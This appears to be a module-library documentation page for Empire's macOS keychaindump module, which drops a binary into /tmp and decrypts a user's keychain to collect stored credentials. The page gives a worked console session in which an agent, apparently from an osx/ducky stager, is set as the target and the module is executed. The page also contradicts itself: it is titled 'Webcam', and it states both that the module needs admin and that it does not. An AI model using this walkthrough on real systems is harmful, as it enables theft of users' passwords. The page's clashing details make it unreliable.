Webcam - Empire Module


This page contains detailed information about how to use the python/collection/osx/keychaindump Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview

Name: Webcam
Module: python/collection/osx/keychaindump
Source code: empire/server/modules/python/collection/osx/keychaindump.yaml
MITRE ATT&CK: T1142
Language: Python
Needs admin: Yes
OPSEC safe: No
Background: No

The keychaindump module searches for keychain candidates and attempts to decrypt the user's keychain.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the keychaindump module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options

This is a list of options that are required by the keychaindump module:

Agent
Agent to execute module on.

TempDir
Temporary directory to drop the keychaindump binary.
Default value: /tmp/.

Additional Module Options

This is a list of additional options that are supported by the keychaindump module:

KeyChain
Manual location of keychain to decrypt, otherwise default.

Keychaindump Example Usage

Here's an example of how to use the keychaindump module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/osx/ducky) > usemodule python/collection/osx/keychaindump

 Author       Juuso Salonen                                                       
 Background   False                                                               
 Comments     https://github.com/juuso/keychaindump                               
 Description  Searches for keychain candidates and attempts to decrypt the user's 
              keychain.                                                           
 Language     python                                                              
 Name         python/collection/osx/keychaindump                                  
 NeedsAdmin   True                                                                
 OpsecSafe    False                                                               
 Techniques   http://attack.mitre.org/techniques/T1142                            


,Record Options----,----------,---------------------------------,
| Name     | Value | Required | Description                     |
|----------|-------|----------|---------------------------------|
| Agent    |       | True     | Agent to execute module on.     |
|----------|-------|----------|---------------------------------|
| KeyChain |       | False    | Manual location of keychain to  |
|          |       |          | decrypt, otherwise default.     |
|----------|-------|----------|---------------------------------|
| TempDir  | /tmp/ | True     | Temporary directory to drop the |
|          |       |          | keychaindump binary.            |
'----------'-------'----------'---------------------------------'

(Empire: usemodule/python/collection/osx/keychaindump) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/python/collection/osx/keychaindump) > set TempDir /tmp/
[*] Set TempDir to /tmp/
(Empire: usemodule/python/collection/osx/keychaindump) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Author

  • Juuso Salonen

References

See Also

Check also the following modules related to this module:

Version

This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.